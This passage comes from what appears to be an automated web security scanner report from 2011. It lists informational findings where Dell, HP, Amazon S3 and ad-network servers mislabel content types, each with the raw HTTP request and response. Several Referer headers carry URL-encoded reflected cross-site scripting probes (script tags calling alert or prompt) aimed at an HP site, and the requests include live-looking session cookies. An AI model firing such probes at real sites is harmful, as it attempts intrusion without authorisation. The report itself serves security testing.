Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 226
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

mboxFactories.get('default').get('MboxTrack',0).cancelTimeout();mboxFactories.get('default').get('MboxTrack',0).setOffer(new mboxOfferDefault()).show();mboxFactories.get('default').getPCId().forceId("
...[SNIP]...

26.13. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/dellinc/mbox/standard?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153150925-582363&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=2&mbox=enus_create&mboxId=0&mboxTime=1315135150965&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40&mboxXDomainCheck=true HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315153150925-582363.19; Domain=dellinc.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 16:19:15 GMT; Path=/m2/dellinc
Content-Type: text/javascript
Content-Length: 166
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

mboxFactories.get('default').get('enus_create',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315153150925-582363.19");

26.14. http://h20180.www2.hp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://h20180.www2.hp.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: h20180.www2.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _rmc_n=1; OAX=Mhd7ak5j/nsACORh; prop12=r3990; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:41:27 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 06:03:57 GMT
Accept-Ranges: bytes
Content-Length: 766
Cache-Control: max-age=7200
Expires: Mon, 05 Sep 2011 00:41:27 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

...... ..............(... ...@...............................................................................................................................fdFfFxFxtFdDFDfFDDDDDdHvDDDDDDDDDDDG..G..
...[SNIP]...

26.15. https://h41183.www4.hp.com/inflexion/scripts/lc-inflexion-lang.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://h41183.www4.hp.com
Path:   /inflexion/scripts/lc-inflexion-lang.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /inflexion/scripts/lc-inflexion-lang.js HTTP/1.1
Host: h41183.www4.hp.com
Connection: keep-alive
Referer: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2d1d586224058f17a991838b0eaac09c

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r PHP/5.3.6
Last-Modified: Tue, 02 Aug 2011 18:04:12 GMT
ETag: "685a0-4787-4a98993323f00"
Accept-Ranges: bytes
Content-Length: 18311
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: application/javascript

var _items = new Array();
   _items[0] = '|'+ lang_pref +' *';
   _items[1] = 'GB|English';
   _items[2] = 'F|Fran..ais';
   _items[3] = 'D|Deutsch';
   _items[4] = 'PTB|Portugu..s do Brasil';
   _items[5] = 'E|E
...[SNIP]...

26.16. http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50480/photo_printer_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50480/photo_printer_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: 7MOA4fUSI4SmMJcZGj/FWfufAzuJdfS0UtxtmwCl4NFqtQ28exruCWQ1FB0K2WFv
x-amz-request-id: 59C9F80F71931654
Date: Sun, 04 Sep 2011 22:44:33 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "6f3169674534e979c1f6fc929845915c"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4489
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......PIDATx..ZiXTG..s'#..[7.@.4....."....(D..EPQ....u..8..$.$1..}..1.D..5......F.d_.H..S.....$....i..:.......9a.._....    ...&.L.. ._M.'
....222B.....^.O..80/..m...7.r.D`.
...[SNIP]...

26.17. http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50481/all_in_one_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50481/all_in_one_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: ogknTt7CpiQ+OFOBKyzr5oJqYQYmZDwzmR1Twxof84coNIFwnVzSrXahnu5ZXhqH
x-amz-request-id: 6ED116A0D75DE3E1
Date: Sun, 04 Sep 2011 22:43:59 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "3131ebf64d6f1463557ddd9d3bb84cb8"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 5027
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......jIDATx..Zw\T..6.In4....4....)........*.":."X..xQD.K4(6D.KD....(.E......R.q....<......}...-7..........g.1......0.`..0.a........g...>..C.|n.L&C....C)... 0.....o....F
...[SNIP]...

26.18. http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50482/ink_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50482/ink_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: fbPl3jnOJGi1s/7RCPnqpcVxznDxt33FICLSfHXlr4FIp28mzLUXXS2iBlTlhJQz
x-amz-request-id: 76581C70946359AD
Date: Sun, 04 Sep 2011 22:44:02 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "56ed4834cfab9c2f49c9ee7cf44a21dc"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 5244
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......CIDATx..Z.TTW..>......34. (FD..UP.P.;((.H.$j4!$.4.'..6...H..*...".....3...|....[.....{.=...}v9wP...    ...g...|....g......|..D...;44<44..?888.o4.c....}}...w...&..g@..
...[SNIP]...

26.19. http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50483/desktops_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50483/desktops_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: DOnX9Qe7TDvy9WmOHLa3eeBViJ8JHub3s+iFWc3ANpCMYxpSceAPXnv1/DvMuOQb
x-amz-request-id: 7D62788332F063BD
Date: Sun, 04 Sep 2011 22:44:00 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "f467aa4bd7ee39ea5f5d9ca57509c2ad"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 2692
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%.....
KIDATx...YLTi...QE...q.A
wP@.l.2(4.PP(.E....%.[d_$tP...AQ!...112...........'.1.:f...:..{R_.-z...^817_.*.......?.......b.>}..n~...?.}.........._<44$`.....mm.4c...G.
...[SNIP]...

26.20. http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50484/notebooks_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50484/notebooks_64.jpg?v=1288625341000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: 7pdAQlYLeq9jy91reBImNV2/yiZtWFsUCQYye24Lr+1dxyUbxyFYcrgHr1mnTgOR
x-amz-request-id: 2BD23795E9B7FF00
Date: Sun, 04 Sep 2011 22:44:02 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:02 GMT
ETag: "2ed2aff39ac38b9413493e5254f0446e"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4734
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......EIDATx..ZwX.......l..7v..,}e....*.F....E.Q...1..B.%F.5*.[.&....&.$..x....;(.../l..1!.....3.<...3......f.[........+...."...+...    <}.......'O......
w<....Ep4..D.....    .
...[SNIP]...

26.21. http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50485/BN_scanners_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50485/BN_scanners_64.jpg?v=1288625341000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: DhzPvUpWjz+Q+D5nOeqilEIXox+54ZBehXHWY0zfEy7W1fuh6mcmF48P6ijIWgEQ
x-amz-request-id: 03C3EFA2F41E6E5A
Date: Sun, 04 Sep 2011 22:44:01 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:02 GMT
ETag: "6ff4f1b5c2a8dc0fb6797d02ccdb606a"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 1934
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......UIDATx..Y.S.G....TL..e.A}3..*g.......f...    "......o1T...r<$)+.$.!A.M."......r&.!..|.M.....2....f......u.s....8l..K.%..`    ..X.,...K.K)`iii..K.........2......._.x0...
...[SNIP]...

26.22. http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50487/BN-mouse_key_usb_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50487/BN-mouse_key_usb_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: ZIiUuIL3Yd17mdL0+BPwuA4KxTx+knmyWl4TjWMv56vR8Zq+VHAQ3zJ8MjGMSLsE
x-amz-request-id: 13CB7D3561BF071B
Date: Sun, 04 Sep 2011 22:44:33 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "44e00f6382f244e09fa10c7e6c05f95d"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 3695
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%......6IDATx....PTW....b.I2.IqR&...I.1..16.("...t...RD0. ....R...."`....."*...h.)....?.......1..q.z..ww.............    .K._..q...n.ji?.j...;F.....    ...4..#.ZZdJ@.pK~Y..i..
...[SNIP]...

26.23. http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50488/Total_care_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50488/Total_care_64.jpg?v=1288625342000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: spdDZaWIdd3DUrtvE15anP8GMDxcQTh7Zd5fsGmlRVf6x7XLj6kohU+9qGQfbKE6
x-amz-request-id: C327828C3141615C
Date: Sun, 04 Sep 2011 22:44:33 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 01 Nov 2010 15:29:03 GMT
ETag: "7f0c19aacd2427ba3795263d623fc3df"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4416
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%.......IDATx..ZyP.Wz..@..N..-..gw+...l.6v\I\.{.;N..l.b.........*.Z.s070.....    . K>........@..I.8...0...=}w.7#..+.....Th.M.....{.....L.?~...,.X...`.......<.I.....\........
...[SNIP]...

26.24. http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hplc-prod.s3.amazonaws.com
Path:   /media/50581/TS_600t_64.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/50581/TS_600t_64.jpg?v=1289247165000 HTTP/1.1
Host: hplc-prod.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: __gads=ID=09bd23b6c398af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw

Response

HTTP/1.1 200 OK
x-amz-id-2: uZNzbYwMLYuX0erva0/xY3Ix3LY7VqZNtp2IPNSl05oyeysrwdrHpcwGZzQZw7Sk
x-amz-request-id: 189D63C63362DB03
Date: Sun, 04 Sep 2011 22:44:03 GMT
Cache-Control: max-age=604800
Last-Modified: Mon, 08 Nov 2010 20:12:46 GMT
ETag: "4cd250bf0b231d8c275e7eacaaf3eef1"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 8958
Server: AmazonS3

.PNG
.
...IHDR...@...@.....%.....".IDATx..z.X.W.6m.........Pf..{.( MT.....b..Wcwc.FM...^cK4....-Q....=....M................<.~.s.~{..zM.?.~..y.?..7<.g...{zz....^o..?..?......W........$.}.%...C..'.u.
...[SNIP]...

26.25. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /index/?pid=1811702&sid=7696162854db74d954e7c2&loc=http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps&rnd=277040346&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=YWD1YmbiWuz7AsS1KVDCF1c5o35KnXdvno5Z0INmj%2F7CpqYepUldLb83WGMbDyg5ReCkbk08Zfg0TU0h%2BMdG5TrOM4XB%2FsDXXBqQGzGd3YSyniLCBefwGVsHiaM4wxoMFMIAI8Y04HfESuUDejuH3kHgzqk94%2BQxrR9q2jXy%2BU3GYjo%3D; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=6pmOZDgtbdXFinvYjnkU10%2FCFThr2pTrkPV0IFbkxoUqTm%2BeAeoBnMC7S4NEVKOWoSpzXeOpE%2BjqrbypMl26KHbbr4%2ByR3YHOlWnPiLWKF91w7kXIcGu27%2F1gfrdQuiM81WwHxYm7B0CQz7i4ZlTtGBJHpa%2FhwhBtezlcJdSVMHhNuRCORFXN407RbsVUJzBVK4SxxDG5Iyy4GAF6hdooaCjrHfn2AL4B%2FIofXGGTj7K0PSVqYo2xlVsiMzwDE3kwDlR5yLTdb1M8%2F%2FY8wHAsLIYV6%2BNxun7AVMtlDBPo7belPN%2BFOUYfWQpY0DQJVALHnjc6qYeO5PKMCYsXrKPrUX3D0Gt7wGvkn25zJuPwoU4XjlCJMV5QsOKQwY1MJhqv1LUcd7xCLjE; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=90315e9a956304f81bb261d08197857d; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=1; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 16:17:06 GMT
Vary: Accept-Encoding
Content-Length: 1288
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoa
...[SNIP]...

26.26. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=466&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf+web+application+security%26pbx%3D1%26oq%3Dwaf+web+application+security%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&tzo=360&ms=828 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.imperva.com/products/wsc_web-application-firewall.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
